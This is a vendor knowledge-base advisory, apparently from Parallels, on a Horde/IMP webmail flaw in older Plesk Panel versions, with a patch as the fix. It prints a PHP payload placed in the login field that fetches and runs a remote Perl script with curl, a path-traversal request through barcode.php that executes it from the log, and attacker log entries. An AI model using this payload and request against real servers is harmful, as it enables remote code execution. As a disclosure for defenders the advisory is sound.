Search

Language:  
Search for:

Available article translations:

Horde/IMP Plesk Webmail Exploit

APPLIES TO:
  • Parallels Plesk Panel 9.3 for Linux/Unix
  • Parallels Plesk Panel 9.2 for Linux/Unix
  • Parallels Plesk Panel 9.0 for Linux/Unix
  • Parallels Plesk Panel 8.6 for Linux/Unix
  • Parallels Plesk Panel 9.3 for Windows
  • Parallels Plesk Panel 9.2 for Windows
  • Parallels Plesk Panel 9.0 for Windows
  • Parallels Plesk Panel 8.6 for Windows

Symptoms

The Horde/IMP package (3.1.7-3.3.2) that is shipped with Plesk v. 8.x and earlier versions of 9.x (before 9.5.4) has a vulnerability that allows an attacker to run malicious software by passing the login to the webmail with a POST request to the /horde/imp/redirect.php file that includes the PHP code as the username. For example:
 
<?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>

 
This results in the PHP code being logged to the /var/log/psa-horde/psa-horde.log file, which, due to a vulnerability in the barcode.php file, allows attackers to cause Horde to execute the code by making this request:
 
/horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log

 
Here is what the actual requests the attacker uses and the log entry from the psa-horde.log file would look like:
 
66.240.226.25 - - [17/Jan/2012:08:01:19 -0500] "POST /horde/imp/redirect.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
66.240.226.25 - - [17/Jan/2012:08:01:35 -0500] " /horde/util/barcode.php?type=../../../../../../../../../../../var/log/psa-horde/psa-horde.log%00 HTTP/1.1" 200 13160 "1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
Jan 17 08:01:35 HORDE [error] [imp] FAILED LOGIN 66.240.226.25 to localhost:143[imap/notls] as <?php passthru("cd /tmp;curl -O -s http://domain.tld/new.txt;perl new.txt;rm -rf new.txt"); ?>@casanh.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

Resolution

Download the appropriate patch for Horde 3.1.7-3.3.2 in accordance with the platform your server runs on. Unzip it, and place the file in the corresponding folder:

Linux:
/usr/share/psa-horde/lib/Horde/  - [ patch ]

Windows:
%plesk_vhosts%\webmail\horde\lib\Horde\ - [ patch ]


Attachments:


5bee747753f35b405aa781017ebd750d 49af2da0f2dd4c81e962790bbbd0c2b4 5fc602d72ea565f353b9320e2ef62a1b c9a51db9739ff1afe0e40fbfb2f7491d 328043b54e01cddd451fabf58e2a065e 1aa1c890c6389095129322a3a7c695a6 7bdfe0216e011d547a49a1324179002f 4cf552a419b63c46a83e80b4d83ff93f 67bc5ae39ea4ac36a5874b72e35ffc6b 5d735c0e028ee5b991e4fb80d34fb87f 6eab23e8dac1eb5df9820a41f94cf4b4 970a12d7813e6f20383aaae2db2a50d6 eaf03e7826482ed35cfffd6b443c593e 75b59b1c6cdbaf382ebb2e4d11777032 eebd3e4553e0e16d6c38a58d2d023118 56797cefb1efc9130f7c48a7d1db0f0c

FEEDBACK
Was this article helpful?
Tell us how we may improve it.
Yes No
 
 
 
 
 
 
Desktop Virtualization
- Parallels Desktop 8 for Mac
- Parallels Transporter
- Parallels Desktop Switch to Mac Edition
- Parallels Desktop for Mac Enterprise Edition
- Parallels Management-Mac for Microsoft SCCM
Server Virtualization
- Parallels Cloud Server
- Parallels Containers for Windows 6.0 Beta
- Parallels Virtuozzo Containers
Automation
- Parallels Automation
- Parallels Automation for Cloud Infrastructure
- Parallels Business Automation Standard
- Parallels Virtual Automation
- Parallels Plesk Panel Suite
- Web Presence Builder
- Parallels Plesk Automation
- Parallels Small Business Panel
- Value-added Services for Hosters
- Parallels Partner Storefront
Services & Resources
- Cloud Acceleration Services
- Professional Services
- Support Services
- Training & Certification